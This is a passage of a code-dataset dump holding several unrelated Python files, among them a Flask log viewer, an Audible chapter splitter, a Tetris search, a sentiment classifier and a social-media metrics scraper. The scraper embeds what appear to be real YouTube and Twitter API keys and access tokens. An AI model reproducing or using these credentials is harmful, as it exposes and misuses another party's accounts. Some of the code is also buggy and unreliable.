All)\n\t}\n\tIf any of kvargs == \"\" filter of this mark will not work.\n\n\t\"\"\"\n\tfull_log += \"##\"\n\tsearch_result = re.findall(\n\t\tr'(\\d{2}\\:\\d{2}\\:\\d{2} \\d{2}\\/\\d{2}\\/\\d{4}) \\- (\\d+\\.\\d+\\.\\d+\\.\\d+)\\n(.*?)\\n##', \n\t\tfull_log, re.S)\n\t# Create a list of dictionaries with information \n\t# about request(date, ip, counter info).\n\trequests = [{\"datetime\": datetime.strptime(line[0], '%H:%M:%S %d/%m/%Y'), \n\t\t\t\t\t\"ip\": line[1],\n\t\t\t\t\t\"request_body\": json.loads(line[2])} for line in search_result] \n\n\t# Translate readout_dt \"1465193586\" --> \"2016-06-06\" in all measurments.\t\t\t\t\t\n\tfor request in requests:\n\t\tfor counter in request.get(\"request_body\").get(\"data\"):\n\t\t\tcounter[\"readout_dt\"] = (date.fromtimestamp(int(counter[\"readout_dt\"])))\n\n\t# Add a filter if request ip != kvargs[\"ip\"], this request not add to result.\n\tif kvargs[\"ip\"]:\n\t\trequests = filter(lambda request: request[\"ip\"] == kvargs[\"ip\"], requests)\n\n\t# Add a filter if request[\"datetime\"] != kvargs['request_date'], this error not add to result.\t\n\tif kvargs['request_date']:\n\t\trequests = filter(lambda request: \n\t\t\trequest[\"datetime\"].strftime('%d %m %Y') == kvargs['request_date'].strftime('%d %m %Y'), \n\t\t\trequests)\n\n\t# Add a filter if sn of counter != kvargs[\"sn\"], this request not add to result.\n\tif kvargs['sn']:\n\t\trequests = filter(lambda request: \n\t\t\trequest.get(\"request_body\").get(\"sn\") == kvargs['sn'], requests)\n\n\t# Add a filter if measurment date \"readout_dt\" < kvargs['start_date'], \n\t# this measurment not add to result.\n\tif kvargs['start_date']:\n\t\tfor request in requests:\n\t\t\trequest.get(\"request_body\")[\"data\"] = filter(\n\t\t\t\tlambda item: item[\"readout_dt\"] >= datetime.date(kvargs['start_date']), \n\t\t\t\trequest.get(\"request_body\")[\"data\"])\n\n\t\trequests = filter(lambda request: \n\t\t\tlen(request.get(\"request_body\").get(\"data\")) >= 1, requests)\n\n\t# Sorting result list by date (early -> late).\n\trequests.sort(key = lambda i: i[\"datetime\"], reverse = True)\t\n\treturn requests\n\n@app.route('/')\ndef index():\n\t\"\"\"Render index page\"\"\"\n\treturn render_template('index.html')\n\n@app.route('/datareceiver', methods=['GET','POST'])\ndef datareceiver():\n\t\"\"\"Get data in JSON format from client and add information\n\tabout requset in request.log. Return status: OK if success.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\tlogger = logging.getLogger('app.views')\n\tlogger.setLevel(logging.INFO)\n\n\tlogger.addHandler(request_file_hendler)\n\tdata = request.get_json()\n\tlogger.info('{}\\n{}'.format(request.remote_addr, \n\t\t\t\t\t\t\t\tjson.dumps(data, encoding=\"ascii\"))) \n\treturn jsonify({'status' : 'OK'}), 200\n\n@app.route('/getlog', methods=['GET','POST'])\ndef getlog():\n\t\"\"\"Return to client render_template of error_log or request_log\n\t1. Get from client what type of log he want's to see (errors or requests).\n\t2. Get list of dictionaries from get_list_of_errors or get_list_of_requset\n\twith emty named arguments.\n\t3. Return to a client html page with content of errors or requests log.\n\n\t\"\"\"\n\tif request.method == 'GET':\n\t\treturn abort(404)\n\t\n\tfilename = get_file_name(request.get_json())\n\twith open(os.path.join(base_dir, filename)) as fd:\n\t\tfull_log = fd.read()\n\n\tif not full_log:\n\t\treturn jsonify({'log':'
[FILE_IN [\\\"ffmpeg options\\\" [OUTPUT_EXT]]]\")\n print()\n print(\"Examples:\")\n print(sys.argv[0] + \" B00TKSFFJE\")\n print(sys.argv[0] + \" \\\"https://stories.audible.com/audibleapi/1.0/content/B00TKSFFJE/metadata?drm_type=Hls&response_groups=chapter_info\\\"\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4\")\n print(sys.argv[0] + \" B00TKSFFJE pierre_et_le_loup.mp4 \\\"-b:a 64k -c:a mp3\\\" mp3\")\n exit()\n\nchapters_url = sys.argv[1]\n\nfile_in = \"file_in.mp4\"\nif len(sys.argv) > 2:\n file_in = sys.argv[2]\nfile_ext = file_in.split('.')[-1]\n\nffmpeg_option = \"-c copy\"\nif len(sys.argv) > 3:\n ffmpeg_option = sys.argv[3]\nif len(sys.argv) > 4:\n file_ext = sys.argv[4]\n\nif re.fullmatch(r\"[\\w]+\", chapters_url):\n chapters_url = f\"https://stories.audible.com/audibleapi/1.0/content/{chapters_url}/metadata?drm_type=Hls&response_groups=chapter_info\"\n\nresp = requests.get(chapters_url)\ncontent = resp.json()\nchapters = content['content_metadata']['chapter_info']['chapters']\n\n\n\n\nfor i, chapter in enumerate(chapters):\n start_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['start_offset_ms'] / 1000))) + '.' + f\"{(chapter['start_offset_ms'] % 1000):03d}\"\n length_ms = str(time.strftime('%H:%M:%S', time.gmtime(chapter['length_ms'] / 1000))) + '.' + f\"{(chapter['length_ms'] % 1000):03d}\"\n filename = f\"{i:03d} {chapter['title']}.{file_ext}\"\n filename = re.sub(r\"[^\\w\\-_\\. ']\", '_', filename)\n print(f\"ffmpeg -i \\\"{file_in}\\\" -ss {start_ms} -t {length_ms} {ffmpeg_option} \\\"{filename}\\\" && ^\")\n\nprint(\"echo Done!\")","sub_path":"split_audible.py","file_name":"split_audible.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"231397684","text":"\nimport numpy as np\nimport time\n \nclass Board():\n def __init__(self, bits, depth = 0, max_depth = 3, board_size = (20, 10)):\n self.bits = bits\n if depth == 0: \n self.score = 0\n else: \n self.score = self.calculateScore()\n self.depth = depth \n self.children = []\n self.max_depth = max_depth\n self.board_size = board_size\n \n def generateBoard(self, shape):\n children = []\n if self.depth < self.max_depth: \n if shape == \"I\": \n #vertical \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0] \n for num, i in enumerate(highests * (highests > 3)): \n if i > 0:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[range(i-4,i), num] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n # horizontal \n for i in range(self.board_size[1] - 3):\n if np.all(highests[range(i,i+4)] > 0):\n num = min(highests[range(i,i+4)]) - 1\n if np.all(highests[range(i,i+4)] == highests[i]):\n mask = np.zeros(self.board_size, dtype=bool)\n mask[num, range(i,i+4)] = True \n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b)\n if shape == \"O\": \n highests = np.argmax(self.bits, 0) \n highests[highests == 0 & np.logical_not(self.bits[0])] = self.board_size[0]\n doesNotTouchCeiling = (highests * (highests > 1))\n for num, (i, j) in enumerate(zip(doesNotTouchCeiling[:-1], doesNotTouchCeiling[1:])):\n if i > 0 and j > 0: \n ind = min(highests[range(num, num + 2)]) - 1\n if highests[num] == highests[num+1]:\n mask = np.zeros(self.board_size, dtype=bool)\n mask[ind-1, num] = True\n mask[ind, num] = True\n mask[ind-1, num+1] = True\n mask[ind, num+1] = True\n b = Board(self.bits | mask, self.depth + 1, self.max_depth, self.board_size) \n children.append(b) \n return(children) \n def __str__(self):\n outstr = \"\"\n for x in self.bits:\n for y in x:\n if y:\n outstr += \"o \"\n else: \n outstr += \". 
\"\n outstr += \"\\n\"\n return outstr \n\n def countChildren(self, num = 0):\n for x in self.children:\n num = x.countChildren(num)\n return num + len(self.children) \n\n def countChildren(self, num = 0):\n for x in self.children:\n num = x.countChildren(num)\n return num + len(self.children) \n \n def printTerminalNodes(self):\n for x in self.children:\n x.printTerminalNodes()\n if not x.children:\n print(x)\n \n def calculateScore(self):\n return(np.min(np.where(self.bits)[0]), getLongestLowest(self.bits))\n \n\nn = 100\nboard_size = (20, 10)\na = Board(np.zeros(board_size, dtype=bool), 0, 5, board_size)\nchildren = []\nchildren.extend(a.generateBoard(\"O\")[:n])\nchildren.extend(a.generateBoard(\"I\")[:n])\na.children = children\na.children.sort(key=lambda s: s.score, reverse=True)\nfor x in a.children: \n children = []\n children.extend(x.generateBoard(\"O\")[:n])\n children.extend(x.generateBoard(\"I\")[:n])\n x.children = children\n x.children.sort(key=lambda s: s.score, reverse=True)\n for y in x.children:\n children = []\n children.extend(y.generateBoard(\"O\")[:n])\n children.extend(y.generateBoard(\"I\")[:n])\n y.children = children\n y.children.sort(key=lambda s: s.score, reverse=True)\n for z in y.children:\n children = []\n children.extend(z.generateBoard(\"O\")[:n])\n children.extend(z.generateBoard(\"I\")[:n])\n z.children = children\n z.children.sort(key=lambda s: s.score, reverse=True)\n \na.countChildren()\n\n\nprint(z)\n\ndef getLongestLowest(bits):\n horizontal_length = bits.shape[1]\n lowest = np.max(np.where(bits)[0])\n tot = np.sum(np.all(bits,1)) * horizontal_length\n for n1 in range(horizontal_length): \n if not bits[lowest][n1]:\n c = 1 \n for n2 in range(n1+1, horizontal_length):\n c += 1\n if bits[lowest][n2]:\n break\n tot = max(c, tot) \n return(tot) \n","sub_path":"Tetris/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"192546291","text":"from nider.core import Font\nfrom nider.core import Outline\nfrom nider.models import Content\nfrom nider.models import Linkback\nfrom nider.models import Paragraph\nfrom nider.models import Image\nimport json\n\nf = open(\"quotes.json\", \"r\")\nFile_json = json.load(f, encoding='ISO 8859-1')\nroboto_font_folder = '/home/ziad/Desktop/Console_Posts/Posts/'\ntext_outline = Outline(2, '#121212')\n\ndef img_to_txt(txt,author,result):\n para = Paragraph(text=txt,\n font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n text_width=30,\n align='center',\n color='#ededed',\n outline=text_outline\n )\n linkback = Linkback(text=author,\n font=Font(roboto_font_folder + 'Roboto-Black.ttf',30),\n color='#ededed',\n outline=text_outline\n )\n content = Content(paragraph=para, linkback=linkback)\n img = Image(content,\n fullpath=result,\n width=3000,\n height=2005\n )\n img.draw_on_image('bg.png')\ndef quote_Text(counter):\n global File_json\n quoteText = File_json[counter]['quoteText']\n return quoteText\ndef quote_Author(counter):\n global File_json\n quoteAuthor = \"-\" + File_json[counter]['quoteAuthor'] \n return quoteAuthor\nfor counter in range(550):\n result = str(counter) + \".png\"\n img_to_txt(quote_Text(counter),quote_Author(counter),result)\n","sub_path":"img_return.py","file_name":"img_return.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"72745364","text":"from .base import FunctionalTest\nfrom .list_page import ListPage\nfrom .my_lists_page import MyListsPage\n\ndef quit_if_possible(browser):\n #try: browser.quit()\n #except: pass\n browser.quit()\n\nclass SharingTest(FunctionalTest):\n def test_can_share_a_list_with_another_user_pt1(self):\n list_page = ListPage(self)\n \n # Edith is a logged-in user\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the home page and starts a list\n self.browser.get(self.live_server_url)\n \n list_page.add_list_item('Get help')\n \n # She notices a \"Share this list\" option\n share_box = list_page.get_share_box()\n \n # and notices that the placeholder \"your-friend@example.com\" is present\n self.assertEqual(\n share_box.get_attribute('placeholder'),\n 'your-friend@example.com'\n )\n \n # She shares her list by entering the email address of a friend\n # The page updates to say that it's shared with Oniciferous:\n list_page.share_list_with('oniciferous@example.com')\n\n\n ## note - in order for this to work, all 3 parts need to be made part of the same test. Because otherwise, the temporary database used is destroyed between tests, creating a false error\n #def test_can_share_a_list_with_another_user_pt2(self):\n # list_page = ListPage(self)\n\n # Ediths friend Oniciferous is also hanging out on the lists site as a logged in user\n self.create_pre_authenticated_session('oniciferous@example.com')\n\n # Oniciferous goes to the lists page with his browser\n MyListsPage(self).go_to_my_lists_page()\n\n # He sees Edith's list in there!\n self.browser.find_element_by_link_text('Get help').click()\n\n # On the list page, Oniciferous can see says that it's Edith's list\n self.wait_for(lambda: self.assertIn(\n 'edith@example.com',\n list_page.get_list_owner()\n ))\n\n # He adds an item to the list\n list_page.add_list_item('Hi Edith!')\n\n #def test_can_share_a_list_with_another_user_pt3(self):\n # list_page = ListPage(self)\n\n # When Edith refreshes the page, she sees Oniciferous's addition\n self.create_pre_authenticated_session('edith@example.com')\n\n # Edith goes to the lists page in her browser\n MyListsPage(self).go_to_my_lists_page()\n\n # She clicks on the list that she created earlier\n self.browser.find_element_by_link_text('Get help').click()\n\n # And finds that Oniciferous has added something to her list\n list_page.wait_for_row_in_list_table('Hi Edith!', 2)\n \n \n ","sub_path":"functional_tests/test_sharing.py","file_name":"test_sharing.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"2636082","text":"# -*- coding: utf-8 -*-\n###################################################################################\n#\n# Copyright (C) 2020 Odox SoftHub LLP()\n# Author: Albin Mathew()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n###################################################################################\n\nfrom odoo import api, fields, models\n\n\nclass ResConfigSettings(models.TransientModel):\n _inherit = 'res.config.settings'\n\n commission_account_id = fields.Many2one(comodel_name='account.account', string=\"Commission Account\")\n discount_account_id = fields.Many2one(comodel_name='account.account', string=\"Discount Account\")\n bank_fee_account_id = fields.Many2one(comodel_name='account.account', string=\"Bank Fee Account\")\n currency_diff_account_id = fields.Many2one(comodel_name='account.account', string=\"Currency Diff Account\")\n\n @api.model\n def get_values(self):\n res = super(ResConfigSettings, self).get_values()\n params = self.env['ir.config_parameter'].sudo()\n res.update(\n commission_account_id=int(params.get_param('odx_sale_purchase_customization.commission_account_id')),\n\n )\n res.update(\n discount_account_id=int(params.get_param('odx_sale_purchase_customization.discount_account_id')),\n\n )\n res.update(\n bank_fee_account_id=int(params.get_param('odx_sale_purchase_customization.bank_fee_account_id')),\n\n )\n res.update(\n currency_diff_account_id=int(params.get_param('odx_sale_purchase_customization.currency_diff_account_id')),\n\n )\n\n return res\n\n def set_values(self):\n super(ResConfigSettings, self).set_values()\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.commission_account_id\",\n self.commission_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.discount_account_id\",\n self.discount_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.bank_fee_account_id\",\n self.bank_fee_account_id.id)\n self.env['ir.config_parameter'].sudo().set_param(\"odx_sale_purchase_customization.currency_diff_account_id\",\n self.currency_diff_account_id.id)\n\n\n\n","sub_path":"odx_sale_purchase_customization/models/res_config_settings.py","file_name":"res_config_settings.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"345334325","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 30 18:51:15 2018\n\n@author: brihat\n\"\"\"\n\n#import nltk\n#nltk.download('stopwords')\n#nltk.download('punkt')\nfrom nltk.corpus import stopwords\n\nfrom sklearn.model_selection import train_test_split\n#from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import SGDClassifier\n\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn import metrics\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import numpy as np\n\nclass MovieReviews:\n \n def readText(filename):\n DF = pd.read_csv(filename, sep = \"\\n\", header = None)\n DF.columns = ['Reviews']\n return DF\n \n \n def splitDataframe(pandasDataFrame):\n train, test = train_test_split(pandasDataFrame, test_size = 0.15)\n return train, test\n \n def mergeDataFrame(pandasDataFrame1, pandasDataFrame2, pos, neg):\n DF1 = pandasDataFrame1.assign(label = pos)\n DF2 = pandasDataFrame2.assign(label = neg)\n df_new = pd.concat([DF1, DF2])\n return df_new\n \n def usePipeline(pandasDataFrame):\n stop = set(stopwords.words('english'))\n text_clf = Pipeline([('vect', TfidfVectorizer(ngram_range = (1, 2), min_df = 2, stop_words = stop)),\n ('clf', SGDClassifier()),])\n\n return text_clf\n \n \n def fitTrainData(text_clf, pandasDataFrame):\n text_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n return text_clf\n \n def predictionWithAccuracy(text_clf, pandasDataFrame):\n predicted = text_clf.predict(pandasDataFrame.Reviews)\n #accuracy = np.mean(predicted == pandasDataFrame.label)\n return predicted\n \n def getMetrics(gs_clf, pandasDataFrame):\n target_names = ['PR', 'NR']\n predictionList = gs_clf.predict(pandasDataFrame.Reviews)\n result = metrics.classification_report(pandasDataFrame.label, predictionList, target_names = target_names)\n return result, predictionList\n \n def getConfusionMatrix(pandasDataFrame, predictionList):\n conf_matrix = metrics.confusion_matrix(pandasDataFrame.label, predictionList)\n return conf_matrix\n \n def useGridSearch(text_clf, pandasDataFrame):\n C = [0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]\n param_grid = [{'clf__alpha': C, 'clf__loss': ['hinge', 'squared_hinge', 'log'], 'clf__max_iter': [100]}]\n gs_clf = GridSearchCV(text_clf, param_grid = param_grid, cv = 10, n_jobs = -1)\n gs_clf = gs_clf.fit(pandasDataFrame.Reviews, pandasDataFrame.label)\n best_score = gs_clf.best_score_\n best_param = gs_clf.best_params_\n return gs_clf, best_score, best_param\n \n def getROCCurve(gs_clf, pandasDataFrame):\n score_roc = gs_clf.decision_function(pandasDataFrame.Reviews)\n fpr, tpr, thresholds = metrics.roc_curve(pandasDataFrame.label, score_roc)\n roc_auc = metrics.auc(fpr, tpr)\n plt.title('Receiver Operating Characteristic')\n plt.plot(fpr, tpr, 'b', label = 'AUC = %0.2f' % roc_auc)\n plt.legend(loc = 'lower right')\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.plot([0,1], [0, 1], 'r--')\n plt.show()\n \nif __name__ == '__main__':\n RD = MovieReviews\n posReviewDF = RD.readText(\"rt-polarity.pos\")\n negReviewDF = RD.readText(\"rt-polarity.neg\")\n #print (negReviewDF) \n #posReviewDF1 = RD.removeStopwords(posReviewDF)\n #negReviewDF1 = RD.removeStopwords(negReviewDF)\n #print(posReviewDF1)\n posReviewDFTrain, posReviewDFTest = RD.splitDataframe(posReviewDF)\n negReviewDFTrain, negReviewDFTest = 
RD.splitDataframe(negReviewDF)\n #print(negReviewDFTrain) \n reviewTrainDF = RD.mergeDataFrame(posReviewDFTrain, negReviewDFTrain, 1, 0)\n reviewTestDF = RD.mergeDataFrame(posReviewDFTest, negReviewDFTest, 1, 0)\n print(negReviewDFTest)\n print(posReviewDFTest)\n print(posReviewDFTest.shape, negReviewDFTest.shape)\n print(reviewTestDF.shape)\n text_clf = RD.usePipeline(reviewTrainDF) \n gs_clf, best_score, best_param = RD.useGridSearch(text_clf, reviewTrainDF)\n print(\"best_score: \")\n print(best_score)\n print(\"Best Parameter: \")\n print(best_param)\n MetricsF1Scores, predictionList = RD.getMetrics(gs_clf, reviewTestDF)\n print(\"Metrics: \")\n print(MetricsF1Scores)\n conf_matrix = RD.getConfusionMatrix(reviewTestDF, predictionList)\n print(\"Confusion Matrix :\")\n print(conf_matrix)\n \n RD.getROCCurve(gs_clf, reviewTestDF)\n \n ","sub_path":"src/MovieReviewSGDclassifier.py","file_name":"MovieReviewSGDclassifier.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"607823293","text":"import unittest\nfrom torch.autograd import gradcheck\nfrom quantize import *\n\nclass TestQuantize(unittest.TestCase):\n def test_softmin_back(self):\n x = (torch.rand(20, 10, dtype=torch.double, requires_grad=True),)\n self.assertTrue(gradcheck(softmin, x))\n\n def test_quantize(self):\n x = 2*torch.rand((100, 100), dtype=torch.double) - 1\n centers = 2*torch.arange(200, dtype=torch.double)*1/200 - 1\n qx = quantize(x, centers, 0.1)\n ax = (x * 100).round() / 100\n print(x)\n print(qx)\n self.assertTrue(torch.mean(torch.abs(qx - ax)) < 1/400)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_quantize.py","file_name":"test_quantize.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"230091423","text":"\"\"\"\nnaming conventions\nclass names = camelCase\nnormal variables and functions = names_with_underscore\nglobal variables = CAPITAL\nglobal constant varibales = CAPITAL_CONST\n\"\"\"\n\nimport firebase_admin\nfrom firebase_admin import credentials\nimport connection\nimport threading\n\nFIREBASE_URL_CONST = \"\"\nPRIVATE_KEY_PATH = \"\"\n\ndef thread():\n t1 = threading.Thread(target=hardware.get_gps)\n t2 = threading.Thread(target=hardware.get_rfid)\n t3 = threading.Thread(target=hardware.get_camera)\n t1.start()\n t2.start()\n t3.start()\n\nif __name__ == \"__main__\":\n import sys\n\n cred = credentials.Certificate(PRIVATE_KEY_PATH)\n firebase_admin.initialize_app(cred, {\n 'databaseURL': FIREBASE_URL_CONST\n })\n\n hardware = connection.piHandler()\n thread()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"115523582","text":"# Opus/UrbanSim urban simulation software.\r\n# Copyright (C) 2010-2011 University of California, Berkeley, 2005-2009 University of Washington\r\n# See opus_core/LICENSE \r\n\r\nfrom urbansim.abstract_variables.abstract_number_of_agents_with_same_attribute_value import abstract_number_of_agents_with_same_attribute_value\r\n\r\nclass same_sector_employment_in_zone(abstract_number_of_agents_with_same_attribute_value):\r\n \"\"\"\"\"\"\r\n \r\n agent_attribute_name = \"job.sector_id\"\r\n agent_dependencies = ['urbansim_parcel.job.zone_id']\r\n choice_set_dependencies = ['urbansim_parcel.building.zone_id']\r\n #unique_agent_attribute_value = range(1, 20)\r\n geography_dataset_name = 'zone'\r\n ## use default\r\n #expression_agents_of_attribute_by_geography = \"'agents_of_attribute_%(agent_attribute_value)s = %(geography_dataset_name)s.aggregate(%(agent_attribute_name)s==%(agent_attribute_value)s)'\"\r\n \r\n \r\nfrom opus_core.tests import opus_unittest\r\nfrom opus_core.tests.utils.variable_tester import VariableTester\r\nfrom numpy import arange, array\r\nfrom numpy import ma\r\nclass Tests(opus_unittest.OpusTestCase):\r\n \r\n def test_my_inputs(self):\r\n tester = VariableTester(\r\n __file__,\r\n package_order=['urbansim_parcel', 'urbansim', 'opus_core'],\r\n test_data={\r\n \"job\":{ \r\n 'job_id': array([1, 2, 3, 4, 5, 6]),\r\n 'building_id':array([1, 1, 5, 3, 3, 3]),\r\n 'sector_id': array([1, 1, 2, 1, 3, 3]),\r\n }, \r\n \"building\":{ \r\n 'building_id': array([1, 2, 3, 4, 5,]),\r\n 'zone_id': array([1, 2, 2, 3, 4,]),\r\n },\r\n 'zone':{\r\n 'zone_id': array([1,2,3,4]),\r\n },\r\n })\r\n ## mind the mirror of gridcells in waling_distance calculus\r\n should_be = array([[2, 1, 1, 0, 0], \r\n [2, 1, 1, 0, 0],\r\n [0, 0, 0, 0, 1],\r\n [2, 1, 1, 0, 0],\r\n [0, 2, 2, 0, 0],\r\n [0, 2, 2, 0, 0]])\r\n \r\n tester.test_is_close_for_variable_defined_by_this_module(self, should_be)\r\n\r\n\r\nif __name__=='__main__':\r\n opus_unittest.main()\r\n","sub_path":"urbansim_parcel/job_x_building/same_sector_employment_in_zone.py","file_name":"same_sector_employment_in_zone.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"43748699","text":"import json\nimport requests\nimport sys\nimport datetime\nimport time\nimport pandas\nimport tweepy\nfrom TwitterAPI import TwitterAPI\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nsys.stdout.flush()\n\n\ndef instagram_api(keyword):\n url1 = 'https://www.instagram.com/web/search/topsearch/?query='\n url2 = keyword\n url = url1 + url2\n\n response = requests.get(url)\n response_data = response.json()\n\n # GET FOLLOWER COUNT & HASHTAG COUNT\n follower_count = response_data['users'][0]['user']['follower_count']\n hashtag_count = 0\n for hashtag in response_data['hashtags']:\n hashtag_count += hashtag['hashtag']['media_count']\n\n return(follower_count, hashtag_count)\n\n\ndef youtube_id_mapping(input_list):\n out_list = []\n for i in input_list:\n q = i\n key = \"AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U\"\n url = \"https://www.googleapis.com/youtube/v3/search?part=snippet&q=\" + q + \"&type=channel\" + \"&key=\" + key\n response = requests.get(url)\n response_data = response.json()\n out_list.append(response_data['items'][0]['id']['channelId'])\n\n return out_list\n\n\ndef youtube_api(user_id):\n key = 'AIzaSyCXfJz6Z8X30I9GgFg14z2M6sQfhNObo5U'\n url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&id=\" + user_id + \"&key=\" + key\n # User Name으로 접근하기\n #url = \"https://www.googleapis.com/youtube/v3/channels?part=statistics&forUsername=\"+name+\"&key=\"+key\n\n response = requests.get(url)\n response_data = response.json()\n\n out_data = response_data['items'][0]['statistics']\n return(int(out_data['viewCount']), int(out_data['commentCount']), int(out_data['subscriberCount']), int(out_data['videoCount']))\n\n\ndef twitter_api(keyword):\n # Consumner_key & Secret / Access_Token & Secret\n consumer_key = \"mq7ecRYTpx3OXcF6E5pCTGZTF\"\n consumer_secret = \"tRboVBFKrnxAXEjaNwwBRfWgZAqXowETSqKOtdSU4RNZUM9NSG\"\n\n access_token = \"991892597391081473-sXwXOYP253t85KWEBrqs3WPpOu7its4\"\n access_token_secret = \"pPiDRxsb5CZjdyZXZahzlFBl1xwfQ7hTTVxLJdKbA4xwd\"\n\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, parser=tweepy.parsers.JSONParser())\n\n # Get user's information -> follower count, favorite count, friends count, listed count\n user = api.search_users(keyword)\n user = user[0]\n return(user['followers_count'], user['favourites_count'], user['friends_count'], user['listed_count'])\n\n\n\n\n\n\n###############################################################\n# 자동으로 시간별 데이터 쌓기 (기간 단위 = 5분으로 Test)\n###############################################################\nprint('Start Test & nohup out test', flush=True)\n\n# SETTING\ntest_term = 60*5 # term = seconds (test: 5분씩 갱신 -> 1주일씩 갱신하려면 test_term = 60*60*24*7)\nres_list = [\"Nando’s\", \"KFC\", \"Subway\", \"Burger King\",\"Pizza Hut\", \"Domino’s\", \"Carl’s JR.\", \"Green Burrito\",\n \"McDonald’s\", \"Dunkin’ Donuts\", \"Tacobell\", \"Auntie Anne’s\", \"Cinnabon\",\"Charleys Philly Steak\",\n \"Quiznos\", \"Nathan’s Famous\", \"Red Robin\", \"Gourmet Burgers and Brew\",\"Shake shack\",\n \"Five Guys\", \"Chipotle\", \"In-N-Out\", \"Jack in the box\"] #release(1) company list\n\n\n# Res name -> HASHTAG 때문에 특수문자 제거 필요\ntem_res_list = []\nfor i in res_list:\n tem = i.replace(\"\\'\",\"\")\n tem = tem.replace(\"’\",\"\")\n tem = tem.replace(\".\",\"\")\n tem = tem.replace(\",\",\"\")\n tem = tem.replace(\"-\",\"\")\n tem_res_list.append(tem)\n\nres_list = tem_res_list\nyoutube_id_list = 
youtube_id_mapping(res_list) # 각 식당에 대한 유튜브 id 맵핑\n\n\n# WHILE LOOP\ntest_count = 0 # Test시에는 무한루프가 최대 100번 돌도록 설정\ntest_limit = 100\n\nwhile(True):\n date_list = []\n name_list = []\n instagram_follow_count_list = []\n instagram_hashtag_count_list = []\n youtube_view_count_list = []\n youtube_comment_count_list = []\n youtube_subscriber_count_list = []\n youtube_video_count_list = []\n twitter_follower_count_list = []\n twitter_favorite_count_list = []\n twitter_friends_count_list = []\n twitter_listed_count_list = []\n\n if test_count == test_limit:\n print(\"FINISH\", flush = True)\n break\n test_count += 1\n \n time.sleep(test_term)\n time_key = datetime.datetime.now()\n\n for i in range(len(res_list)):\n time.sleep(60) # Twitter api -> call 당 time.sleep(60) 필요함\n tem_list = []\n try:\n insta_follower, insta_hashtag = instagram_api(res_list[i])\n except:\n insta_follower, insta_hashtag = 0,0\n\n try:\n twit_follower, twit_favorites, twit_friends, twit_listed = twitter_api(res_list[i])\n except:\n twit_follower, twit_favorites, twit_friends, twit_listed = 0,0,0,0\n\n try:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video =youtube_api(youtube_id_list[i])\n except:\n youtub_view, youtub_comment, youtub_subscriber, youtub_video = 0,0,0,0\n \n date_list.append(time_key)\n\n\n #BIG QUERY에 쌓을 때 레스토랑 네임 -> 소문자, 공백제거로 통일\n res_name = str(res_list[i]).lower()\n res_name = res_name.replace(\" \",\"\")\n name_list.append(res_name)\n\n instagram_follow_count_list.append(insta_follower)\n instagram_hashtag_count_list.append(insta_hashtag)\n youtube_view_count_list.append(youtub_view)\n youtube_comment_count_list.append(youtub_comment)\n youtube_subscriber_count_list.append(youtub_subscriber)\n youtube_video_count_list.append(youtub_video)\n twitter_follower_count_list.append(twit_follower)\n twitter_favorite_count_list.append(twit_favorites)\n twitter_friends_count_list.append(twit_friends)\n 